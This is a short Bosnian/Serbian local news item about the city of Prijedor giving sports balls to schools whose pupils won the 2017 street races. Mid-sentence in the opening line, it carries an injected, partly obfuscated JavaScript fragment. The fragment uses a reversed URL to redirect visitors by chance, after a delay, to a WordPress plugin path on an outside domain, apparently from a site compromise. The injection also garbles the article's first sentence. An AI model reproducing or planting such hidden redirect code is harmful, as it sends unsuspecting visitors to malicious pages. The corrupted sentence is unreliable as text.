Lopte za najuspješnije takmičare

Na nedavnim 24. međtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}unarodnim uličnim trkama „Prijedor 2017“ najuspješniji kod osnovaca bili su takmičari škole „Petar Kočić“ Prijedor, a kod srednjoškolaca učenici Mašinske škole. Grad je prepoznao ove rezultate i tim povodom danas je, u ime gradonačelnika Milenka Đakovića, načelnik Odjeljenja za društvene djelatnosti Monja Kasalović uručila poklon – lopte.

Gorana Bosančić, direktor osnovne škole „Petar Kočić“ kaže da podstiču učenike na bavljenje sportom. Rezultati ima , a poklon lopte će im dobro doći, istakla je Bosančićeva i zahvalila se gradskoj upravi na nagradi.

Učenici devetih razreda škole Petar Kočić Nikola Brdar i Ana Reljić posebno su obradovani poklonom i kažu da će svim đacima košarkaške, odbojkaške i rukometne lopte dobro doći.

Mašinska škola Prijedor godinama postiže izvanredne rezultate na uličnim trkama u našem gradu, a interes za nastup učenika je ogroman ističe direktor Dijana Šobot i izražava zahvalnost gradskoj upravi na poklonu.

Učenik Mašinske škole Alen Čaušević dodaje da su redovni učesnici uličnih trka u našem gradu a poklon će im dobro doći u redovnoj nastavi.

Grad Prijedor značajna sredstva izdvaja za razvoj školskog sporta i podržava sportske talente i klubove.

Pogrebni prevoz Iris Lim Profi Prijedor Panta rhei Prijedor